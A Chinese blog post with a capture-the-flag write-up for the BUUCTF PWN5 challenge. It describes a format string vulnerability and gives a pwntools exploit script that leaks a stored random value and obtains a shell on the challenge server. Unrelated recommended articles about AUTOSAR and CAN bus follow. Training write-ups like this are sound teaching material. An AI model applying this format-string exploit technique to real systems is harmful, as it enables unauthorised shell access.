BUUCTF的[第五空间2019 决赛]PWN5

最新推荐文章于 2025-03-21 09:21:35 发布
最新推荐文章于 2025-03-21 09:21:35 发布
阅读量204 收藏
点赞数 1
分类专栏: CTF PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/frist_csdn/article/details/123153967
版权

使用IDA打开

可以看到明显的格式化字符串漏洞 ,它是在bss段0x804c044存储了一个随机数,然后通过最后比较输入的passwd和随机数是否一样,如果一样就打开/bin/sh命令。
我的思路是,通过格式化字符串漏洞泄露0x804c044的数据,然后把得到的数据作为有符号的整数的字符串输入给nptr,然后程序会用atoi把字符串转换为整型。
在pwndbg中对程序调试,发现输入的buf和esp差距为0x28,所以是第十个格式化参数。 
from pwn import *
p = remote("node4.buuoj.cn", 29667)
#p = process('./pwn')
payload = flat(0x804c044, "ok%10$sok")
p.recv()
p.sendline(payload)
p.recvuntil("ok")
num = p.recvuntil("ok",drop = True)
n = u32(num)

## 因为使用u32()函数在64位机器上解包得到的数字不会出现负数,所以自己对n进行判断,如果大于0x100000000,就肯定是一个负数的补码。
if n>0x8fffffff:
    n = n-0x100000000
p.sendline(str(n))
p.interactive()
最低0.47元/天 解锁文章
SOME/IP和SOME/IP-SD服务发现通信的时序图和状态图 - AutoSAR
带你成为别人眼中的大佬!
08-07 318
其中,SOME/IP(Scalable service-Oriented MiddlewarE over IP)和SOME/IP-SD(Service Discovery)是AutoSAR中用于服务发现通信的重要组件。SOME/IP和SOME/IP-SD是AutoSAR中用于服务发现通信的重要组件,能够实现高效而可靠的实时通信。本文介绍了SOME/IP和SOME/IP-SD的时序图和状态图,并提供了相应的源代码示例,帮助读者理解和实践相关的通信机制。SOME/IP-SD是基于SOME/IP的服务发现机制。
AUTOSAR - CANTP - 学习三 :规范时序图解读
梦想技术家
05-09 1064
CanTp位于CanIf与PDUR之间,主要目的是对大于8字节的CAN I-PDU,大于64字节的CANFD I-PDU进行分段与重组。对单帧、多帧的接收发送,从规范里面给出来了很详细的解读,每一个步骤需要干什么,需要执行什么功能函数,返回的E_OK状态有什么指示等都有明确的步骤。
CAN总线 时序分析
weixin_45560089的博客
04-24 3412
can总线通信,在嵌入式设计中使用非常广泛,下面是本人在开发过程中对于can总线通信的一些理解,不到之处还望批评指正。 CAN总线原理图如下: 下面是在调试过程中示波器波形: 上面的是clk,下面的rxd,下面的数据解析为: 1 10111100111 11011110000110100101010101100000000 can总线数据分为 显性电平:0 隐性电平:1 从上面可以看出采...
CAN总线位时序说明
11-28
介绍CAN位时序,在MicroPython配置波特率时需要了解,配合MicroPython官方文档更好的理解及应用
AUTOSAR - CANSM - 学习四 :CANSM子状态机与时序解读
梦想技术家
03-23 1553
CanSM子状态机与时序图
CAN波形时序解析
17208955的博客
01-12 6885
(2) 接收单元的工作在接收数据帧和遥控帧时, SOF~CRC 段间的数据,相同电平如果持续 5 位,需要删除下一个位(第 6 个位)再接收。(1) 发送单元的工作在发送数据帧和遥控帧时, SOF~CRC 段间的数据,相同电平如果持续 5 位,在下一个位(第 6 个位)则要插入 1 位与前 5 位反型的电平。仲裁段包括:11位基本ID、1位SRR、1位IDE、18位扩展ID、1位RTR。总线上执行逻辑上的线“与”时,显性电平的逻辑值为“0”,隐性电平为“1”。第二位是应答界定符,是一个必须为“隐性”的位。
AUTOSAR - CANIf学习CANIf规范时序图
IlagCompile的博客
09-18 173
CAN Controller:CAN Controller模块是实际的CAN控制器硬件驱动,它负责将数据通过CAN总线发送出去。CAN Driver:CAN Driver模块是CANIf模块的底层驱动程序,它负责与实际的CAN控制器进行通信。CAN Driver模块接收到CANIf模块的传输请求后,将其转发给CAN Controller模块。在这个时序图中,有四个参与者:Application(应用程序),CANIf,CAN Driver和CAN Controller。函数向CANIf模块发送PDU。
AUTOSAR通信篇 - CAN网络通信(二:CanIf
热门推荐
IOT2017的博客
05-29 1万+
CanIf的主要功能就是隔离底层硬件(驱动)区别,为上层提供统一的调用接口。其角色定位于"上传下达"的中转站。另外CanIf根据需求可配置的报文缓存。熟悉CanIf提供的常用API及其功能,即可满足日常工作中遇到问题分析的需求。
AUTOSAR Communication Hardware Abstraction - CanIf:(一)CanIf相关功能、API整理与序列图
最新发布
不吃鱼的猫的博客
03-21 928
描述:初始化CAN的内外接口,以进一步使用。在调用CanIf_Init初始化之前,除了CanIf_GetVersionInfo(),不能使用CanIf模块其他API!!ConfigPtr:指向AUTOSAR COM模块配置数据的指针。
课程学习--设计模式 画图规范(第4期):时序图
查理的博客
04-13 1952
时序图 画图规范
TechnicalReference_CanIf_CANIF_autosarcanif_
10-04
autosarcanif模块对应的技术文档,可以指导开发人员进行模块开发和使用
714_AUTOSAR_TR_TimingAnalysis2_时序分析的基本概念以及软件架构
小灰笔记
08-04 815
全部学习汇总: https://github.com/GreyZhang/hack_autosar 继续分析《AUTOSAR_TR_TimingAnalysis》,这个算是近期看到的文档里面最贴近实际技术实现的文档了。 用例 为了展示时序分析方法的建议用法,文档中包含了许多实际用例。 用例使用与章节相同的结构分为几类: ECU 级别的时序分析(第 3 章) ...
COM01-AutoSAR CAN通信发送和接收概述【发送和接收用例分析及Sequence图】
09-19 5625
通信软件栈包含多个模块,通信接收是通过各个模块的API接口实现的,从下至上(接收逻辑:CanDrv>CanIf->PduR->Com->Rte->SwcAppReceiver从下至上(接收逻辑:CanDrv>CanIf->PduR->Com->Rte->SwcAppReceiver。通信软件栈包含多个模块,通信发送是通过各个模块的API接口实现的,从上至下(发送逻辑)为:SwcAppSender->Rte->Com->PduR->CanIf->CanDrv。
CAN总线系列二:时序以及数据帧分析
挨踢农民的博客
04-01 3363
若通讯节点检测到总线上信号的跳变沿被包含在SS段的范围之内,则表示节点与总线的时序是同步的,当节点与总线同步时,采样点采集到的总线电平即可被确定为该位的电平。总线上的各个通讯节点只要约定好1个Tq的时间长度以及每一个数据位占据多少个Tq,就可以确定CAN通讯的波特率。,主要用来补偿边沿阶段的误差,它的时间长度在重新同步的时候可以加长。,其中SS段占1Tq, PTS段占6Tq, PBS1段占5Tq, PBS2段占7Tq。,通过控制各段的长度,可以对采样点的位置进行偏移,以便准确地采样。
AutoSAR CANIF层配置代码分析
wanglei_11的博客
11-20 805
AutoSAR CANIF层代码分析
AutoSAR CanIf生成代码分析
带你成为别人眼中的大佬!
07-31 294
CanIf_Receive函数用于接收CAN总线上的数据。CanIf是基于AutoSAR标准开发的,AutoSAR是一种面向汽车领域的软件架构标准,提供了统一的接口和规范,以实现不同厂商的软件组件的互操作性。CanIfAutoSAR标准中的一个模块,用于封装与CAN通信相关的功能,并提供给上层应用程序使用。在主循环中,我们可以通过CanIf_Receive函数来接收CAN总线上的数据,并进行相应的处理。CanIf_ConfigType是CanIf生成代码中的一个结构体,用于配置CanIf模块的参数。
Autosar CAN开发02(应用报文接收流程-中断方式,CAN/CANIF/PDUR/COM/RTE)
qq_41848098的博客
12-21 1万+
Vector工具链中底层应用报文接收流程
CanIf发送PDU机制实例代码分析
01-26 1432
文章目录1 发送PDU的前提条件2 发送PDU提供的接口3 成功发送PDU的行为 传送门 ==>> AutoSAR实战系列300讲「糖果Autosar」总目录 1 发送PDU的前提条件 CanIf要让发送PDU传输到CAN驱动层去发送,必须满足下面三个条件: (1)Ecum 初始化阶段应成功调用CanIf_Init ,Can_Init (2)PDU模式处于 CANIF_GET_TX_ONLINE/ CANIF_GET_ONLINE (3)控制器模式处于CANIF_CS_STARTED 上面的
COM10 - AutoSAR CanIf生成代码分析
06-05 1769
传送门 ==>> AutoSAR实战系列300讲「糖果Autosar」总目录 摘要:CanIf的配置参数的定义如下图所示,我们根据需求配置各个参数的值,然后工具通过读取各个定义参数的值,生成相应的代码。本文从代码和配置参数两个角度进行阐述。 2 CanIf 模块配置参数分析 2.1 CanIfPublicCfg 包含模块范围的配置。用于在 CanIf 中启用 tx 缓冲。ArcCanIfPublicMaxNumberOfTxBuffers 和 ArcCanIfPublicTxBufferSize 的目的是
AUTOSAR网络管理时序图
12-30
AUTOSAR网络管理的时序图如下所示: ``` @startuml participant ECU participant CanIf participant NmIf ECU -> CanIf: 发送CAN消息 CanIf -> NmIf: 通知网络管理 NmIf -> CanIf: 请求CAN消息 CanIf -> ECU: 返回CAN消息 ECU -> NmIf: 响应网络管理请求 @enduml ``` 时序图中,ECU通过CanIf发送CAN消息,CanIf接收到CAN消息后通知NmIf进行网络管理。NmIf向CanIf发送请求CAN消息的请求,CanIf将请求转发给ECU,并将ECU返回的CAN消息传递给NmIf。ECU根据NmIf的请求进行相应的处理,并将处理结果响应给NmIf。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值